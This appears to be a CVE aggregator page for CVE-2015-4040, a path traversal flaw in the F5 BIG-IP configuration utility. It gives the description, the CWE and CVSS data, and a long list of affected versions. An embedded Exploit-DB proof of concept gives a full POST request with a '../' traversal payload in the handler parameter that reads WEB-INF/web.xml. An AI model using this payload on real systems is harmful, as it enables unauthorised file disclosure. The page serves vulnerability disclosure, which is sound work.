CVE-2015-4040 Detail

CVE-2015-4040

CVE Descriptions

Directory traversal vulnerability in the configuration utility in F5 BIG-IP before 12.0.0 and Enterprise Manager 3.0.0 through 3.1.1 allows remote authenticated users to access arbitrary files in the web root via unspecified vectors.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-22	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	4		AV:N/AC:L/Au:S/C:P/I:N/A:N	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 38448

Publication date : 2015-10-12 22h00 +00:00
Author : Karn Ganeshen
EDB Verified : No

# Exploit Title: [F5 BigIP File Path Traversal Vulnerability] # Discovered by: Karn Ganeshen # Reported on: April 27, 2015 # New version released on: September 01, 2015 # Vendor Homepage: [www.f5.com] # Version Reported: [F5 BIG-IP 10.2.4 Build 595.0 Hotfix HF3] # CVE-2015-4040 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4040 ] # Multiple Additional F5 products & versions are Affected and documented here: https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html *Vulnerability Details* The handler parameter is vulnerable to file path manipulation attacks. When we submit a payload */tmui/locallb/virtual_server/../../../../WEB-INF/web.xml* in the *handler* parameter, the file *WEB-INF/web.xml* is returned. *PoC:* POST /tmui/Control/form HTTP/1.1 Host: <IP> Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https:// <IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?&FilterBy=status_availability&Filter=2 Content-Type: application/x-www-form-urlencoded Content-Length: 1004 Cookie: JSESSIONID=3211A73547444840255BAF39984E7E3F; BIGIPAuthUsernameCookie=admin; BIGIPAuthCookie=9B1099DD8A936DDBD58606DA3B5BABC7E82C43A5; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/locallb/virtual_server/list.jsp?&"; f5_refreshpage="https%3A//<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp"; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay="" _timenow=Fri+Apr+24+14%3a48%3a38+EST+2015&_bufvalue_before=6hU2%2fMbRfPe7OHQ7VVc7TEffOpg%3d&exit_page=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&search_input=*&search_button_before=Search&_timeno *...[SNIP]...* fore=&enableObjList_before=&exit_page_before=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&row_count=0&_bufvalue_validation=NO_VALIDATION&disable_before=Disable&exit_button_before=Create...&handler= *%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml* *Web.xml is returned in the Response:* <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN" "http://java.sun.com/j2ee/dtds/web-app_2_2.dtd"> *<web-app>* *...[config file output redacted here]...* *.....*

Products Mentioned

Configuraton 0

F5>>Enterprise_manager >> Version 3.0.0

F5>>Enterprise_manager >> Version 3.0.0 (Open CPE detail)

F5>>Enterprise_manager >> Version 3.1.0

F5>>Enterprise_manager >> Version 3.1.0 (Open CPE detail)

F5>>Enterprise_manager >> Version 3.1.1

F5>>Enterprise_manager >> Version 3.1.1 (Open CPE detail)

Configuraton 0

F5>>Big-ip_access_policy_manager >> Version To (including) 11.6.0

F5>>Big-ip_access_policy_manager >> Version - (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 7.1.6 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 7.1.7.1 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 7.1.9 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 7.2.1 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 7.2.1.3 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 7.2.2 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 7.2.3 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 7.2.4 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 7.2.4.1 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 7.2.4.4 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.3.0 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.4.0 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.4.1 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.0 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.1 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.2 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.3 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.4.1 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.4.2 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.4.2.74.291 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.4.3 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.4.4 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.5 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.6 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.7 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.8 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.9 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.5.10 (Open CPE detail)
F5>>Big-ip_access_policy_manager >> Version 11.6.0 (Open CPE detail)

F5>>Big-ip_advanced_firewall_manager >> Version To (including) 11.6.0

F5>>Big-ip_advanced_firewall_manager >> Version - (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.3.0 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.4.0 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.4.1 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.0 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.1 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.2 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.3 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.4.1 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.4.2 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.4.2.74.291 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.4.3 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.4.4 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.5 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.6 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.7 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.8 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.9 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.5.10 (Open CPE detail)
F5>>Big-ip_advanced_firewall_manager >> Version 11.6.0 (Open CPE detail)

F5>>Big-ip_analytics >> Version To (including) 11.6.0

F5>>Big-ip_analytics >> Version - (Open CPE detail)
F5>>Big-ip_analytics >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_analytics >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_analytics >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_analytics >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_analytics >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_analytics >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.3.0 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.4.0 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.4.1 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.0 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.1 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.2 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.3 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.4.2 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.4.2.74.291 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.4.3 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.4.4 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.5 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.6 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.7 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.8 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.9 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.5.10 (Open CPE detail)
F5>>Big-ip_analytics >> Version 11.6.0 (Open CPE detail)

F5>>Big-ip_application_acceleration_manager >> Version To (including) 11.6.0

F5>>Big-ip_application_acceleration_manager >> Version - (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.3.0 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.4.0 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.4.1 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.0 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.1 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.2 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.3 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.4.1 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.4.2 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.4.2.74.291 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.4.3 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.4.4 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.5 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.6 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.7 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.8 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.9 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.5.10 (Open CPE detail)
F5>>Big-ip_application_acceleration_manager >> Version 11.6.0 (Open CPE detail)

F5>>Big-ip_application_security_manager >> Version To (including) 11.6.0

F5>>Big-ip_application_security_manager >> Version - (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.2.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.2.2 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.2.3 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.2.4 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.2.5 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.3.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.3.1 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.4.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.4.1 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.4.2 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.4.3 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.4.4 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.4.5 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.4.6 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.4.7 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.4.8 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.6.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 9.6.1 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 10.0.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 10.0.1 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.3.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.4.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.4.1 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.0 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.1 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.2 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.3 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.4.1 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.4.2 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.4.2.74.291 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.4.3 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.4.4 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.5 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.6 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.7 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.8 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.9 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.5.10 (Open CPE detail)
F5>>Big-ip_application_security_manager >> Version 11.6.0 (Open CPE detail)

F5>>Big-ip_edge_gateway >> Version To (including) 11.3.0

F5>>Big-ip_edge_gateway >> Version - (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_edge_gateway >> Version 11.3.0 (Open CPE detail)

F5>>Big-ip_global_traffic_manager >> Version To (including) 11.3.0

F5>>Big-ip_global_traffic_manager >> Version - (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.2.2 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.2.3 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.2.4 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.2.5 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.3.0 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.3.1 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.4.0 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.4.1 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.4.2 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.4.3 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.4.4 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.4.5 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.4.6 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.4.7 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.4.8 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.6.0 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 9.6.1 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 10.0.0 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 10.0.1 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_global_traffic_manager >> Version 11.3.0 (Open CPE detail)

F5>>Big-ip_link_controller >> Version To (including) 11.3.0

F5>>Big-ip_link_controller >> Version - (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.2.2 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.2.3 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.2.4 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.2.5 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.3.0 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.3.1 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.4.0 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.4.1 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.4.2 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.4.3 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.4.4 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.4.5 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.4.6 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.4.7 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.4.8 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.6.0 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 9.6.1 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 10.0.0 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 10.0.1 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_link_controller >> Version 11.3.0 (Open CPE detail)

F5>>Big-ip_local_traffic_manager >> Version To (including) 11.6.0

F5>>Big-ip_local_traffic_manager >> Version - (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.1.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.1.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.1.2 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.1.3 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.2.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.2.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.2.2 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.2.3 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.2.4 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.2.5 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.3.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.3.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.4.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.4.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.4.2 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.4.3 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.4.4 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.4.5 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.4.6 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.4.7 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.4.8 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.6.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 9.6.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 10.0.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 10.0.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.3.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.4.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.4.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.0 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.2 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.3 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.4 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.4.1 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.4.2 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.4.2.74.291 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.4.3 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.4.4 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.5 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.6 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.7 (Open CPE detail)
